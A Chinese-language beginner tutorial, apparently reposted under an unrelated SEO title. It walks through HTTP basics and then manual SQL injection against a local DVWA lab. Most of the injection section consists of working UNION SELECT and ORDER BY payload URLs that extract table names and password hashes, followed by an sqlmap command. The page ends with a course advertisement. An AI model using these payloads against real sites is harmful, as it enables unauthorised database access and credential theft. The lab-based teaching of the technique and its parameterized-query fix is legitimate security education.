海南省住房建设厅网站wordpress中文图片不显示
海南省住房建设厅网站,wordpress中文图片不显示,连云港网站建设连云港,crm系统是什么意思转行 Web 安全#xff1a;从 HTTP 协议到 SQL 注入#xff0c;3 步入门法 “听说 Web 安全是转行热门#xff0c;但打开教程全是‘Burp 抓包’‘SQLMap 跑洞’#xff0c;连‘HTTP 请求头里的 Cookie 是干嘛的’都不懂#xff0c;越看越慌”—— 这是多数转行小白接触 Web…转行 Web 安全从 HTTP 协议到 SQL 注入3 步入门法“听说 Web 安全是转行热门但打开教程全是‘Burp 抓包’‘SQLMap 跑洞’连‘HTTP 请求头里的 Cookie 是干嘛的’都不懂越看越慌”—— 这是多数转行小白接触 Web 安全的第一感受。Web 安全的核心不是 “一上来就用工具挖漏洞”而是 “先懂 Web 怎么跑再懂漏洞怎么来”。本文针对转行群体设计 “3 步入门法”从最基础的 HTTP 协议入手到理解参数注入逻辑再到手动复现 SQL 注入每步都有 “可动手的实战 可落地的成果”不用复杂工具1 周就能完成从 “小白” 到 “能复现基础漏洞” 的跨越。第一步吃透 HTTP 协议 ——Web 安全的 “地基”2-3 天核心目标搞懂 “浏览器和服务器怎么说话”因为所有 Web 漏洞包括 SQL 注入都源于 HTTP 交互中的 “参数传递”—— 这一步没学透后续看漏洞原理只会 “似懂非懂”。学什么只学 “转行入门必用” 的核心核心要素转行必懂内容拒绝冗余怎么理解通俗类比请求方法GET参数在 URL 里如?id1、POST参数在请求体如登录表单像寄快递GET 是 “快递单写在箱子外面”POST 是 “写在箱子里”状态码200成功、404页面不存在、500服务器错误、302跳转像快递反馈200“签收成功”404“地址错了”500“快递站爆了”关键头字段Cookie身份标识如登录后服务器发的 “通行证”、Referer请求来源如从哪个页面跳过来的Cookie 像 “小区门禁卡”Referer 像 “快递单上的‘寄件人地址’”请求体POST表单参数格式如usernameadminpassword123像 “信封里的纸条”写着要传给服务器的具体信息怎么实战用浏览器就能练不用装工具任务 1用 Chrome 开发者工具抓 “登录请求”1 小时打开一个简单的登录页推荐用本地部署的 DVWA 登录页http://127.0.0.1/DVWA/login.php没部署的话用任意公开登录页如测试用的http://testphp.vulnweb.com/login.php按 F12 打开 “开发者工具”切换到 “Network” 面板勾选 “Preserve log”保留日志输入任意账号密码如test/test123点击登录找到名为 “login.php” 的请求Method 是 POST查看关键信息请求方法确认是 POST看 “Method” 列请求体点击 “Payload”→“Form Data”看到usernametestpasswordtest123这就是传给服务器的参数Cookie点击 “Headers”→“Request Headers”找到 “Cookie” 字段里面的PHPSESSID就是服务器给你的 “临时门禁卡”状态码看 “Status” 列若登录失败可能是 200页面刷新但提示错误成功则是 302跳转到首页。任务 2改参数看响应变化1 小时还是用 DVWA 登录页抓包后点击 “login.php” 请求右键选择 “Copy”→“Copy as cURL”打开电脑的 “命令提示符CMD” 或 “终端”粘贴复制的 cURL 命令把usernametest改成usernameadminpasswordtest123改成passwordpasswordDVWA 默认密码按回车执行观察结果若返回 “Location: index.php”跳转首页说明参数修改成功模拟登录成功—— 这就是 “参数篡改” 的基础也是漏洞的根源若服务器没验证参数就能被恶意利用。成果输出写一篇《HTTP 协议实战笔记》包含3 张截图登录请求的 “Method 状态码”“Form Data 参数”“Cookie 字段”1 个结论“POST 请求的参数在请求体里Cookie 是登录后的身份标识修改参数能改变服务器响应”。第二步理解 “参数注入”——SQL 注入的 “敲门砖”2-3 天核心目标搞懂 “为什么输入特殊字符会引发漏洞”SQL 注入的本质就是 “用户输入的参数被拼接到 SQL 语句里破坏了原有语法”—— 这一步要避开复杂的 SQL 语法用 “人话 例子” 讲透逻辑。学什么只讲 “能帮你理解注入” 的核心逻辑1. 先懂 “正常的参数交互”假设服务器有个 “根据 ID 查用户” 的功能对应的 SQL 语句是SELECT * FROM user WHERE id用户输入的id当你在 URL 里输入?id1时参数id1被拼接到 SQL 里变成SELECT * FROM user WHERE id1 -- 语法正确返回 id1 的用户2. 再看 “注入的发生”如果你输入?id1’多了一个单引号参数被拼接到 SQL 后变成SELECT * FROM user WHERE id1 -- 语法错误两个单引号不匹配服务器若没过滤这个单引号就会返回 “SQL 语法错误”—— 这就是 “SQL 注入点存在” 的信号。3. 关键结论注入的前提用户输入能影响服务器的 SQL 语句语法核心原因服务器没对用户输入做 “过滤” 或 “转义”比如把单引号’转义成’就不会破坏语法。怎么实战用 “手动改 URL” 验证注入点不用工具任务在 DVWA 找 “SQL 注入点”2 小时部署 DVWA 并登录安全等级设为 “Low”方便入门进入 “SQL Injection” 模块URL 是http://127.0.0.1/DVWA/vulnerabilities/sqli/?id1SubmitSubmit验证注入点步骤 1把 URL 里的id1改成id1’按回车页面显示 “SQL syntax error”语法错误—— 说明注入点存在步骤 2再改成id1 AND 11页面正常显示内容因为11是真SQL 语句正常执行步骤 3改成id1 AND 12页面显示 “No user ID found”没结果—— 因为12是假SQL 语句返回空记录结论“这个id参数没过滤特殊字符能改变 SQL 语句的执行结果存在 SQL 注入漏洞”。避坑点转行小白最易犯坑 1分不清 “GET 和 POST 注入”——GET 注入改 URL 参数POST 注入改请求体参数用 Chrome 抓包改 Form Data逻辑一样坑 2看到 “页面没报错” 就以为没注入点 —— 有些服务器会屏蔽错误信息这时用 “1 AND 11” 和 “1 AND 12” 对比响应差异也能判断。成果输出更新《HTTP 协议实战笔记》新增 “参数注入” 章节2 张截图id1’的错误页面、id1 AND 12的空结果页面1 段逻辑分析“用户输入的’和AND 12改变了 SQL 语句执行结果证明id参数存在注入点”。第三步手动复现 SQL 注入 —— 从 “懂原理” 到 “能实战”2-3 天核心目标不用 SQLMap纯手动写出 Payload注入语句获取数据库基础信息如数据库名、表名让转行用户感受到 “从 0 到 1 挖漏洞” 的成就感。学什么只学 “手动注入必用” 的 3 个 Payload注入目标手动 Payload针对 DVWA Low 等级原理说明判断列数id1’ ORDER BY 2-- 改数字直到报错ORDER BY N按第 N 列排序报错说明列数小于 N比如ORDER BY 3-- 报错说明列数是 2获取数据库名id1’ UNION SELECT 1,database()–UNION SELECT合并两个查询结果database()是 SQL 函数返回当前数据库名获取表名id1’ UNION SELECT 1,group_concat(table_name) FROM information_schema.tables WHERE table_schemadatabase()–information_schema是 MySQL 系统库存所有表名group_concat把表名拼在一起显示注-- 是 SQL 注释符作用是 “注释掉后面的内容”避免语法错误比如原 SQL 后面还有’被注释后不影响。怎么实战一步步手动操作每步有反馈任务在 DVWA 手动注入获取 “users 表” 的账号密码3 小时步骤 1判断列数把 URL 改成http://127.0.0.1/DVWA/vulnerabilities/sqli/?id1’ ORDER BY 2-- SubmitSubmit页面正常再改成id1’ ORDER BY 3-- SubmitSubmit页面报错 —— 说明列数是 2。步骤 2获取当前数据库名URL 改成http://127.0.0.1/DVWA/vulnerabilities/sqli/?id1’ UNION SELECT 1,database()-- SubmitSubmit页面显示 “dvwa”—— 这就是当前数据库名。步骤 3获取数据库里的表名URL 改成http://127.0.0.1/DVWA/vulnerabilities/sqli/?id1’ UNION SELECT 1,group_concat(table_name) FROM information_schema.tables WHERE table_schemadatabase()-- SubmitSubmit页面显示 “guestbook,users”—— 这两个是 dvwa 数据库里的表users表就是存账号密码的。步骤 4获取 users 表的字段名URL 改成http://127.0.0.1/DVWA/vulnerabilities/sqli/?id1’ UNION SELECT 1,group_concat(column_name) FROM information_schema.columns WHERE table_name‘users’-- SubmitSubmit页面显示 “user_id,first_name,last_name,user,password,avatar”——user和password就是账号密码字段。步骤 5获取账号密码URL 改成http://127.0.0.1/DVWA/vulnerabilities/sqli/?id1’ UNION SELECT user,password FROM users-- SubmitSubmit页面显示 “admin | 5f4dcc3b5aa765d61d8327deb882cf99”——5f4dcc3b5aa765d61d8327deb882cf99是password的 MD5 哈希值百度 “MD5 解密” 能得到原密码 “password”。工具辅助手动后再用 SQLMap理解工具逻辑当你手动完成注入后再用 SQLMap 验证命令如下会发现工具做的事和你手动操作一致# 命令针对 DVWA 的 SQL 注入点获取数据库列表 sqlmap -u http://127.0.0.1/DVWA/vulnerabilities/sqli/?id1SubmitSubmit --cookiesecuritylow; PHPSESSID你的PHPSESSID --dbs对比结果SQLMap 输出的 “dvwa” 数据库、“users” 表和你手动注入的结果一致 —— 这时你就懂了 “工具只是自动化了手动步骤”不是 “黑盒魔法”。成果输出完成《SQL 注入手动复现报告》包含5 步操作截图从判断列数到获取账号密码每步附 URL 和页面结果1 个对比表格手动注入和 SQLMap 结果的一致性对比1 个修复建议“用参数化查询替代字符串拼接比如把SELECT * FROM user WHERE id$id’改成SELECT * FROM user WHERE id?”。转行 Web 安全的 “3 个关键认知”入门后必看“先手动再工具”别一上来就用 Burp、SQLMap手动复现 1 次 SQL 注入比用工具跑 10 次更懂原理 —— 工具是 “效率提升器”不是 “入门替代品”“基础比工具重要”HTTP 协议没吃透看 SQL 注入只会 “知其然不知其所以然”参数注入逻辑没懂学 XSS、文件上传也会混淆 ——Web 安全的 “地基” 是 Web 基础“小成果积累信心”转行不用一开始就挖 0day能手动复现 SQL 注入、写出报告就是 “能落地的实战经验”比空泛的 “懂 Web 安全” 更有说服力。这 3 步入门法本质是 “从 Web 交互逻辑→漏洞原理→实战复现” 的闭环适合所有转行小白。跟着做完你不仅能复现 SQL 注入更能理解 “其他 Web 漏洞如 XSS、文件上传的核心逻辑都是‘用户输入影响服务器行为’”为后续学习打下扎实基础。网安学习资源分享网上虽然也有很多的学习资源但基本上都残缺不全的这是我们和网安大厂360共同研发的的网安视频教程内容涵盖了入门必备的操作系统、计算机网络和编程语言等初级知识而且包含了中级的各种渗透技术并且还有后期的CTF对抗、区块链安全等高阶技术。总共200多节视频100多本网安电子书最新学习路线图和工具安装包都有不用担心学不全。这些东西我都可以免费分享给大家需要的可以点这里自取:网安入门到进阶资源